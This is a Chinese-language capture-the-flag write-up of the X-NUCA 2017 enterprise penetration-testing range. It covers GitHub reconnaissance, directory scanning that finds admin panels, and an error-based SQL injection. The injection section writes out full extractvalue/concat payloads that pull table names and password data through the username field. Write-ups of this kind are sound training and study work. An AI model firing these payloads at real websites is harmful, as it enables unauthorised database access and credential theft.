X-NUCA17’第三期“企业安全众测”靶场挑战赛writeup

周六打了两场比赛，湖湘杯和x-nuca，真心很累，现在把writeup贴出来，算是总结一下，成绩不是很好，大牛勿喷。

请输入标题 abcdefg

1

情报搜集

根据tips 在github上搜素 user：l1kai

在config里找到flag

请输入标题 abcdefg

2

情报分析

在github上的commit可以看到提交记录，解密提交记录可以得到flag

请输入标题 abcdefg

3

请输入标题 bcdef

开始渗透

对目标站点进行目录扫描，结果发现三个后台，/user、/manager 、

/home/administrator/index.php继续扫描的时候发现user下面的一个模板文件里有flag。这题还有一种获取方式就是，在/user 的后台登陆 ，根据tips登陆用户名是邮箱 likai@youngin.uu.me密码是likai 用于环境无法复现 拿不到flag的值了。

请输入标题 abcdefg

4

获取数据

登陆之后根据tips说是sql注入对目标站点的一个提交界面进行报错注入，在username 进行报错注入，propassword是第二问得到的。Payload 依次为：

proname=aaaa&username=likai%40youngin.uu.me'||extractvalue(1,concat(0x5c,(select%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0alimit%0a1)))||'1&content=ssssssssssssss&propassword=1071f87ebcf2fb9f96f174eca1ee2dd6：

得到表名m_admin

继续注入得到列名

username password

最后在password中得到flag最后一段

需要截取： proname=aaaa&username=likai%40youngin.uu.me'||extractvalue(1,concat((select%0agroup_concat(mid(password,20,100))%0afrom%0am_user%0alimit%0a0,1)))||'1&content=ssssssssssssss&propassword=1071f87ebcf2fb9f96f174eca1ee2dd6

电脑只保存了最后一段flag bb-1992-4ac3-8998-da00c7521933} FLAG值： 只有后一段的flag了 FLAG{xxxxxbb-1992-4ac3-8998-da00c7521933}

5

比赛比完了，总感觉这次CTF不像CTF，渗透也不像渗透，每次比赛都有每次比赛的收获，也希望团队在接下来再创辉煌。

请输入标题 bcdef

原创

文字 排版 /fangzhang

图片/网络